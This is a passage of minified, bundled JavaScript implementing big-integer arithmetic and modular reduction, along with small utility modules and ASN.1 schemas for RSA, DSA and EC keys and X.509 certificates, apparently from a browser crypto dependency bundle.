ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ua,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,A.length++),A};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var A,v=this.length+l.length;return A=10===this.length&&10===l.length?D(this,l,f):v<63?p(this,l,f):v<1024?function w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var A=0,v=0,P=0;P<f.length-1;P++){var G=v;v=0;for(var X=67108863&A,L=Math.min(P,l.length-1),h=Math.max(0,P-z.length+1);h<=L;h++){var ue=(0|z.words[P-h])*(0|l.words[h]),Ie=67108863&ue;X=67108863&(Ie=Ie+X|0),v+=(G=(G=G+(ue/67108864|0)|0)+(Ie>>>26)|0)>>>26,G&=67108863}f.words[P]=X,A=G,G=v}return 0!==A?f.words[P]=A:f.length--,f.strip()}(this,l,f):x(this,l,f),A},S.prototype.makeRBT=function(l){for(var f=new Array(l),A=I.prototype._countBits(l)-1,v=0;v<l;v++)f[v]=this.revBin(v,A,l);return f},S.prototype.revBin=function(l,f,A){if(0===l||l===A-1)return l;for(var v=0,P=0;P<f;P++)v|=(1&l)<<f-P-1,l>>=1;return v},S.prototype.permute=function(l,f,A,v,P,G){for(var X=0;X<G;X++)v[X]=f[l[X]],P[X]=A[l[X]]},S.prototype.transform=function(l,f,A,v,P,G){this.permute(G,l,f,A,v,P);for(var X=1;X<P;X<<=1)for(var L=X<<1,h=Math.cos(2*Math.PI/L),R=Math.sin(2*Math.PI/L),J=0;J<P;J+=L)for(var Z=h,ue=R,Ie=0;Ie<X;Ie++){var Ae=A[J+Ie],Ue=v[J+Ie],Xe=A[J+Ie+X],He=v[J+Ie+X],Be=Z*Xe-ue*He;He=Z*He+ue*Xe,A[J+Ie]=Ae+(Xe=Be),v[J+Ie]=Ue+He,A[J+Ie+X]=Ae-Xe,v[J+Ie+X]=Ue-He,Ie!==L&&(Be=h*Z-R*ue,ue=h*ue+R*Z,Z=Be)}},S.prototype.guessLen13b=function(l,f){var A=1|Math.max(f,l),v=1&A,P=0;for(A=A/2|0;A;A>>>=1)P++;return 1<<P+1+v},S.prototype.conjugate=function(l,f,A){if(!(A<=1))for(var v=0;v<A/2;v++){var P=l[v];l[v]=l[A-v-1],l[A-v-1]=P,P=f[v],f[v]=-f[A-v-1],f[A-v-1]=-P}},S.prototype.normalize13b=function(l,f){for(var A=0,v=0;v<f/2;v++){var P=8192*Math.round(l[2*v+1]/f)+Math.round(l[2*v]/f)+A;l[v]=67108863&P,A=P<67108864?0:P/67108864|0}return l},S.prototype.convert13b=function(l,f,A,v){for(var P=0,G=0;G<f;G++)A[2*G]=8191&(P+=0|l[G]),A[2*G+1]=8191&(P>>>=13),P>>>=13;for(G=2*f;G<v;++G)A[G]=0;$(0===P),$(0==(-8192&P))},S.prototype.stub=function(l){for(var f=new Array(l),A=0;A<l;A++)f[A]=0;return f},S.prototype.mulp=function(l,f,A){var v=2*this.guessLen13b(l.length,f.length),P=this.makeRBT(v),G=this.stub(v),X=new Array(v),L=new Array(v),h=new Array(v),R=new Array(v),J=new Array(v),Z=new Array(v),ue=A.words;ue.length=v,this.convert13b(l.words,l.length,X,v),this.convert13b(f.words,f.length,R,v),this.transform(X,G,L,h,v,P),this.transform(R,G,J,Z,v,P);for(var Ie=0;Ie<v;Ie++){var Ae=L[Ie]*J[Ie]-h[Ie]*Z[Ie];h[Ie]=L[Ie]*Z[Ie]+h[Ie]*J[Ie],L[Ie]=Ae}return this.conjugate(L,h,v),this.transform(L,h,ue,G,v,P),this.conjugate(ue,G,v),this.normalize13b(ue,v),A.negative=l.negative^f.negative,A.length=l.length+f.length,A.strip()},I.prototype.mul=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),this.mulTo(l,f)},I.prototype.mulf=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),x(this,l,f)},I.prototype.imul=function(l){return this.clone().mulTo(l,this)},I.prototype.imuln=function(l){$("number"==typeof l),$(l<67108864);for(var f=0,A=0;A<this.length;A++){var v=(0|this.words[A])*l,P=(67108863&v)+(67108863&f);f>>=26,f+=v/67108864|0,f+=P>>>26,this.words[A]=67108863&P}return 0!==f&&(this.words[A]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function M(z){for(var l=new Array(z.bitLength()),f=0;f<l.length;f++){var v=f%26;l[f]=(z.words[f/26|0]&1<<v)>>>v}return l}(l);if(0===f.length)return new I(1);for(var A=this,v=0;v<f.length&&0===f[v];v++,A=A.sqr());if(++v<f.length)for(var P=A.sqr();v<f.length;v++,P=P.sqr())0!==f[v]&&(A=A.mul(P));return A},I.prototype.iushln=function(l){$("number"==typeof l&&l>=0);var P,f=l%26,A=(l-f)/26,v=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P<this.length;P++){var X=this.words[P]&v;this.words[P]=(0|this.words[P])-X<<f|G,G=X>>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==A){for(P=this.length-1;P>=0;P--)this.words[P+A]=this.words[P];for(P=0;P<A;P++)this.words[P]=0;this.length+=A}return this.strip()},I.prototype.ishln=function(l){return $(0===this.negative),this.iushln(l)},I.prototype.iushrn=function(l,f,A){var v;$("number"==typeof l&&l>=0),v=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<<P,L=A;if(v-=G,v=Math.max(0,v),L){for(var h=0;h<G;h++)L.words[h]=this.words[h];L.length=G}if(0!==G)if(this.length>G)for(this.length-=G,h=0;h<this.length;h++)this.words[h]=this.words[h+G];else this.words[0]=0,this.length=1;var R=0;for(h=this.length-1;h>=0&&(0!==R||h>=v);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,A){return $(0===this.negative),this.iushrn(l,f,A)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return!(this.length<=A||!(this.words[A]&1<<f))},I.prototype.imaskn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return $(0===this.negative,"imaskn works only with positive numbers"),this.length<=A?this:(0!==f&&A++,this.length=Math.min(A,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<<f),this.strip())},I.prototype.maskn=function(l){return this.clone().imaskn(l)},I.prototype.iaddn=function(l){return $("number"==typeof l),$(l<67108864),l<0?this.isubn(-l):0!==this.negative?1===this.length&&(0|this.words[0])<l?(this.words[0]=l-(0|this.words[0]),this.negative=0,this):(this.negative=0,this.isubn(l),this.negative=1,this):this._iaddn(l)},I.prototype._iaddn=function(l){this.words[0]+=l;for(var f=0;f<this.length&&this.words[f]>=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if($("number"==typeof l),$(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f<this.length&&this.words[f]<0;f++)this.words[f]+=67108864,this.words[f+1]-=1;return this.strip()},I.prototype.addn=function(l){return this.clone().iaddn(l)},I.prototype.subn=function(l){return this.clone().isubn(l)},I.prototype.iabs=function(){return this.negative=0,this},I.prototype.abs=function(){return this.clone().iabs()},I.prototype._ishlnsubmul=function(l,f,A){var P;this._expand(l.length+A);var G,X=0;for(P=0;P<l.length;P++){G=(0|this.words[P+A])+X;var L=(0|l.words[P])*f;X=((G-=67108863&L)>>26)-(L/67108864|0),this.words[P+A]=67108863&G}for(;P<this.length-A;P++)X=(G=(0|this.words[P+A])+X)>>26,this.words[P+A]=67108863&G;if(0===X)return this.strip();for($(-1===X),X=0,P=0;P<this.length;P++)X=(G=-(0|this.words[P])+X)>>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var A,v=this.clone(),P=l,G=0|P.words[P.length-1];0!=(A=26-this._countBits(G))&&(P=P.ushln(A),v.iushln(A),G=0|P.words[P.length-1]);var h,L=v.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R<h.length;R++)h.words[R]=0}var J=v.clone()._ishlnsubmul(P,1,L);0===J.negative&&(v=J,h&&(h.words[L]=1));for(var Z=L-1;Z>=0;Z--){var ue=67108864*(0|v.words[P.length+Z])+(0|v.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),v._ishlnsubmul(P,ue,Z);0!==v.negative;)ue--,v.negative=0,v._ishlnsubmul(P,1,Z),v.isZero()||(v.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),v.strip(),"div"!==f&&0!==A&&v.iushrn(A),{div:h||null,mod:v}},I.prototype.divmod=function(l,f,A){return $(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(v=G.div.neg()),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.iadd(l)),{div:v,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(v=G.div.neg()),{div:v,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var v,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var A=0!==f.div.negative?f.mod.isub(l):f.mod,v=l.ushrn(1),P=l.andln(1),G=A.cmp(v);return G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){$(l<=67108863);for(var f=(1<<26)%l,A=0,v=this.length-1;v>=0;v--)A=(f*A+(0|this.words[v]))%l;return A},I.prototype.idivn=function(l){$(l<=67108863);for(var f=0,A=this.length-1;A>=0;A--){var v=(0|this.words[A])+67108864*f;this.words[A]=v/l|0,f=v%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){$(0===l.negative),$(!l.isZero());var f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&A.isEven();)f.iushrn(1),A.iushrn(1),++L;for(var h=A.clone(),R=f.clone();!f.isZero();){for(var J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(v.isOdd()||P.isOdd())&&(v.iadd(h),P.isub(R)),v.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(A.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(A.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(G),P.isub(X)):(A.isub(f),G.isub(v),X.isub(P))}return{a:G,b:X,gcd:A.iushln(L)}},I.prototype._invmp=function(l){$(0===l.negative),$(!l.isZero());var J,f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=A.clone();f.cmpn(1)>0&&A.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)v.isOdd()&&v.iadd(G),v.iushrn(1);for(var h=0,R=1;0==(A.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(A.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(P)):(A.isub(f),P.isub(v))}return(J=0===f.cmpn(1)?v:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),A=l.clone();f.negative=0,A.negative=0;for(var v=0;f.isEven()&&A.isEven();v++)f.iushrn(1),A.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;A.isEven();)A.iushrn(1);var P=f.cmp(A);if(P<0){var G=f;f=A,A=G}else if(0===P||0===A.cmpn(1))break;f.isub(A)}return A.iushln(v)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){$("number"==typeof l);var f=l%26,A=(l-f)/26,v=1<<f;if(this.length<=A)return this._expand(A+1),this.words[A]|=v,this;for(var P=v,G=A;0!==P&&G<this.length;G++){var X=0|this.words[G];P=(X+=P)>>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var A,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)A=1;else{f&&(l=-l),$(l<=67108863,"Number is too big");var v=0|this.words[0];A=v===l?0:v<l?-1:1}return 0!==this.negative?0|-A:A},I.prototype.cmp=function(l){if(0!==this.negative&&0===l.negative)return-1;if(0===this.negative&&0!==l.negative)return 1;var f=this.ucmp(l);return 0!==this.negative?0|-f:f},I.prototype.ucmp=function(l){if(this.length>l.length)return 1;if(this.length<l.length)return-1;for(var f=0,A=this.length-1;A>=0;A--){var v=0|this.words[A],P=0|l.words[A];if(v!==P){v<P?f=-1:v>P&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return $(!this.red,"Already a number in reduction context"),$(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return $(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return $(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return $(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return $(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return $(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return $(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return $(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return $(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return $(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return $(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return $(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return $(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return $(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function U(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){U.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){U.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){U.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){U.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else $(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}U.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},U.prototype.ireduce=function(l){var A,f=l;do{this.split(f,this.tmp),A=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(A>this.n);var v=A<this.n?-1:f.ucmp(this.p);return 0===v?(f.words[0]=0,f.length=1):v>0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},U.prototype.split=function(l,f){l.iushrn(this.n,0,f)},U.prototype.imulK=function(l){return l.imul(this.k)},ae(K,U),K.prototype.split=function(l,f){for(var A=4194303,v=Math.min(l.length,9),P=0;P<v;P++)f.words[P]=l.words[P];if(f.length=v,l.length<=9)return l.words[0]=0,void(l.length=1);var G=l.words[9];for(f.words[f.length++]=G&A,P=10;P<l.length;P++){var X=0|l.words[P];l.words[P-10]=(X&A)<<4|G>>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,A=0;A<l.length;A++){var v=0|l.words[A];l.words[A]=67108863&(f+=977*v),f=64*v+(f/67108864|0)}return 0===l.words[l.length-1]&&(l.length--,0===l.words[l.length-1]&&l.length--),l},ae(ee,U),ae(se,U),ae(ve,U),ve.prototype.imulK=function(l){for(var f=0,A=0;A<l.length;A++){var v=19*(0|l.words[A])+f,P=67108863&v;v>>>=26,l.words[A]=P,f=v}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){$(0===l.negative,"red works only with positives"),$(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){$(0==(l.negative|f.negative),"red works only with positives"),$(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var A=l.add(f);return A.cmp(this.m)>=0&&A.isub(this.m),A._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var A=l.iadd(f);return A.cmp(this.m)>=0&&A.isub(this.m),A},le.prototype.sub=function(l,f){this._verify2(l,f);var A=l.sub(f);return A.cmpn(0)<0&&A.iadd(this.m),A._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var A=l.isub(f);return A.cmpn(0)<0&&A.iadd(this.m),A},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if($(f%2==1),3===f){var A=this.m.add(new I(1)).iushrn(2);return this.pow(l,A)}for(var v=this.m.subn(1),P=0;!v.isZero()&&0===v.andln(1);)P++,v.iushrn(1);$(!v.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,v),J=this.pow(l,v.addn(1).iushrn(1)),Z=this.pow(l,v),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();$(Ae<ue);var Ue=this.pow(R,new I(1).iushln(ue-Ae-1));J=J.redMul(Ue),R=Ue.redSqr(),Z=Z.redMul(R),ue=Ae}return J},le.prototype.invm=function(l){var f=l._invmp(this.m);return 0!==f.negative?(f.negative=0,this.imod(f).redNeg()):this.imod(f)},le.prototype.pow=function(l,f){if(f.isZero())return new I(1).toRed(this);if(0===f.cmpn(1))return l.clone();var v=new Array(16);v[0]=new I(1).toRed(this),v[1]=l;for(var P=2;P<v.length;P++)v[P]=this.mul(v[P-1],l);var G=v[0],X=0,L=0,h=f.bitLength()%26;for(0===h&&(h=26),P=f.length-1;P>=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==v[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,v[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var A=l.imul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var A=l.mul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},490:Pe=>{function we(de,ie){if(!de)throw new Error(ie||"Assertion failed")}Pe.exports=we,we.equal=function(ie,j,$){if(ie!=j)throw new Error($||"Assertion failed: "+ie+" != "+j)}},4108:(Pe,we)=>{"use strict";var de=we;function j(ae){return 1===ae.length?"0"+ae:ae}function $(ae){for(var I="",Q=0;Q<ae.length;Q++)I+=j(ae[Q].toString(16));return I}de.toArray=function ie(ae,I){if(Array.isArray(ae))return ae.slice();if(!ae)return[];var Q=[];if("string"!=typeof ae){for(var F=0;F<ae.length;F++)Q[F]=0|ae[F];return Q}if("hex"===I)for((ae=ae.replace(/[^a-z0-9]+/gi,"")).length%2!=0&&(ae="0"+ae),F=0;F<ae.length;F+=2)Q.push(parseInt(ae[F]+ae[F+1],16));else for(F=0;F<ae.length;F++){var E=ae.charCodeAt(F),g=E>>8,b=255&E;g?Q.push(g,b):Q.push(b)}return Q},de.zero2=j,de.toHex=$,de.encode=function(I,Q){return"hex"===Q?$(I):I}},8225:(Pe,we)=>{"use strict";var ie=function(){if("undefined"!=typeof self)return self;if("undefined"!=typeof window)return window;if("undefined"!=typeof global)return global;throw new Error("unable to locate global object")}();Pe.exports=we=ie.fetch,ie.fetch&&(we.default=ie.fetch.bind(ie)),we.Headers=ie.Headers,we.Request=ie.Request,we.Response=ie.Response},9885:(Pe,we,de)=>{var ie=de(6854);function j(ae){var I=function(){return I.called?I.value:(I.called=!0,I.value=ae.apply(this,arguments))};return I.called=!1,I}function $(ae){var I=function(){if(I.called)throw new Error(I.onceError);return I.called=!0,I.value=ae.apply(this,arguments)};return I.onceError=(ae.name||"Function wrapped with `once`")+" shouldn't be called more than once",I.called=!1,I}Pe.exports=ie(j),Pe.exports.strict=ie($),j.proto=j(function(){Object.defineProperty(Function.prototype,"once",{value:function(){return j(this)},configurable:!0}),Object.defineProperty(Function.prototype,"onceStrict",{value:function(){return $(this)},configurable:!0})})},7934:(Pe,we,de)=>{"use strict";var ie=de(7758);we.certificate=de(3223);var j=ie.define("RSAPrivateKey",function(){this.seq().obj(this.key("version").int(),this.key("modulus").int(),this.key("publicExponent").int(),this.key("privateExponent").int(),this.key("prime1").int(),this.key("prime2").int(),this.key("exponent1").int(),this.key("exponent2").int(),this.key("coefficient").int())});we.RSAPrivateKey=j;var $=ie.define("RSAPublicKey",function(){this.seq().obj(this.key("modulus").int(),this.key("publicExponent").int())});we.RSAPublicKey=$;var ae=ie.define("SubjectPublicKeyInfo",function(){this.seq().obj(this.key("algorithm").use(I),this.key("subjectPublicKey").bitstr())});we.PublicKey=ae;var I=ie.define("AlgorithmIdentifier",function(){this.seq().obj(this.key("algorithm").objid(),this.key("none").null_().optional(),this.key("curve").objid().optional(),this.key("params").seq().obj(this.key("p").int(),this.key("q").int(),this.key("g").int()).optional())}),Q=ie.define("PrivateKeyInfo",function(){this.seq().obj(this.key("version").int(),this.key("algorithm").use(I),this.key("subjectPrivateKey").octstr())});we.PrivateKey=Q;var F=ie.define("EncryptedPrivateKeyInfo",function(){this.seq().obj(this.key("algorithm").seq().obj(this.key("id").objid(),this.key("decrypt").seq().obj(this.key("kde").seq().obj(this.key("id").objid(),this.key("kdeparams").seq().obj(this.key("salt").octstr(),this.key("iters").int())),this.key("cipher").seq().obj(this.key("algo").objid(),this.key("iv").octstr()))),this.key("subjectPrivateKey").octstr())});we.EncryptedPrivateKey=F;var E=ie.define("DSAPrivateKey",function(){this.seq().obj(this.key("version").int(),this.key("p").int(),this.key("q").int(),this.key("g").int(),this.key("pub_key").int(),this.key("priv_key").int())});we.DSAPrivateKey=E,we.DSAparam=ie.define("DSAparam",function(){this.int()});var g=ie.define("ECPrivateKey",function(){this.seq().obj(this.key("version").int(),this.key("privateKey").octstr(),this.key("parameters").optional().explicit(0).use(b),this.key("publicKey").optional().explicit(1).bitstr())});we.ECPrivateKey=g;var b=ie.define("ECParameters",function(){this.choice({namedCurve:this.objid()})});we.signature=ie.define("signature",function(){this.seq().obj(this.key("r").int(),this.key("s").int())})},3223:(Pe,we,de)=>{"use strict";var ie=de(7758),j=ie.define("Time",function(){this.choice({utcTime:this.utctime(),generalTime:this.gentime()})}),$=ie.define("AttributeTypeValue",function(){this.seq().obj(this.key("type").objid(),this.key("value").any())}),ae=ie.define("AlgorithmIdentifier",function(){this.seq().obj(this.key("algorithm").objid(),this.key("parameters").optional(),this.key("curve").objid().optional())}),I=ie.define("SubjectPublicKeyInfo",function(){this.seq().obj(this.key("algorithm").use(ae),this.key("subjectPublicKey").bitstr())}),Q=ie.define("RelativeDistinguishedName",function(){this.setof($)}),F=ie.define("RDNSequence",function(){this.seqof(Q)}),E=ie.define("Name",function(){this.choice({rdnSequence:this.use(F)})}),g=ie.define("Validity",function(){this.seq().obj(this.key("notBefore").use(j),this.key("notAfter").use(j))}),b=ie.define("Extension",function(){this.seq().obj(this.key("extnID").objid(),this.key("critical").bool().def(!1),this.key("extnValue").octstr())}),_=ie.define("TBSCertificate",function(){this.seq().obj(this.key("version").explicit(0).int().optional(),this.key("serialNumber").int(),this.key("signature").use(ae),this.key("issuer").use(E),this.key("validity").use(g),this.key("subject").use(E),this.key("subjectPublicKeyInfo").use(I),this.key("issuerUniqueID").implicit(1).bitstr().optional(),this.key("subjectUniqueID").implicit(2).bitstr().optional(),this.key("extensions").explicit(3).seqof(b).optional())}),y=ie.define("X509Certificate",function(){this.seq().obj(this.key("tbsCertificate").use(_),this.key("signatureAlgorithm").use(ae),this.k